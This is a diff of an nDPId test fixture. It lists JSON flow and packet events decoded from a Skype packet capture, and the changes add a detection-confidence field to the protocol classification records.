 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1431969677975,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969677975,"pkt":"0NQSxnP1PBXCt3IOCABFAABLu3AAAEARO77AqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1431969678136,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1431969678136,"pkt":"0NQSxnP1PBXCt3IOCABFAABPpIgAAEARUqLAqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":1431969678136,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1431969678136,"pkt":"0NQSxnP1PBXCt3IOCABFAABPxoMAAEARMKfAqAEiwKgBAfaEADUAO+FnvnsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAHAAB"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1431969678448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431969678448,"pkt":"0NQSxnP1PBXCt3IOCABFAAA28WwAAEARPrfAqAEinTfrkTLdnFYAInUwnFoCL\/MPOOsaaRslv0+ih8hUClTBOiOZV0s="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1431969678448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431969678448,"pkt":"0NQSxnP1PBXCt3IOCABFAABBiiMAAEARDm3AqAEiQTffGjLdnEQALZMdnFwCzKFKSd3cA9PLS4BXWJFRrjZHyG3cJPIPdrTAqEb6jU8VDg=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1431969679026,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969679026,"pkt":"0NQSxnP1PBXCt3IOCABFAABLE+cAAEAR40fAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1431969679027,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969679027,"pkt":"0NQSxnP1PBXCt3IOCABFAABL8bEAAEARBX3AqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679451,"flow_last_seen":1431969679451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969679451,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431969679451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969679451,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZ+RAAEAG8MXAqAEiQTffDMORnF\/vfD8JAAAAALAC\/\/9szQAAAgQFtAEDAwUBAQgKPiMbhwAAAAAEAgAA"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zKQAAEARzHXAqAEinTeClzLdnFEAJhOjnF4CtwUXw\/VWCApVJdrfxkhI5qU9AKuGw3faL7f5"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5dCsAAEARu0zAqAEi1cezqjLdnEsAJQhSnGAC6QwwmBRocZoeU0bscPTURL89AdihxLtaI+k="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7lc0AAEARZY3AqAEib91NsDLdnFQAJ2jKnGICi6AMRljZtq+Es\/pWkLbSJ\/TvDoZrPj0F5hXOgQ=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1431969679581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969679581,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIpxfw5E\/Sv9r73w\/CqASOJDLRwAAAgQFrAQCCApNoe2VPiMbhwEDAwk="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1431969679581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969679581,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0cmZAAEAG5k\/AqAEiQTffDMORnF\/vfD8KP0r\/bIAQECwh8QAAAQEICj4jHAhNoe2V"}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431969680121,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969680121,"pkt":"0NQSxnP1PBXCt3IOCABFAABLe\/oAAEARezTAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1431969680121,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969680121,"pkt":"0NQSxnP1PBXCt3IOCABFAABLZ0MAAEARj+vAqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1431969680467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431969680467,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5uekAAEARKTXAqAEinTc4lDLdnEoAJXlNnGQC\/A+kfzeJzZXZQQBxWhYkhXip+EvBFG8rlU4="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1431969680467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969680467,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyVhkAAEAR2gHAqAEinTfrnjLdnF8AHti+nGYCSGBvJFR\/HGq\/K9Cny1\/vxLQHiA=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681060,"flow_last_seen":1431969681060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969681060,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1431969681060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969681060,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2fpAAEAGfq\/AqAEiQTffDMOSAbvQogCqAAAAALAC\/\/9eaAAAAgQFtAEDAwUBAQgKPiMhyQAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431969681195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969681195,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIgG7w5Js9UEp0KIAq6ASOJBL6AAAAgQFrAQCCApNoe8nPiMhyQEDAwk="}
@@ -581,50 +581,50 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/b9AAEAGpVbAqAEinTc4oMOTnFuhu64eAAAAALAC\/\/+OBAAAAgQFtAEDAwUBAQgKPiMjagAAAAAEAgAA"}
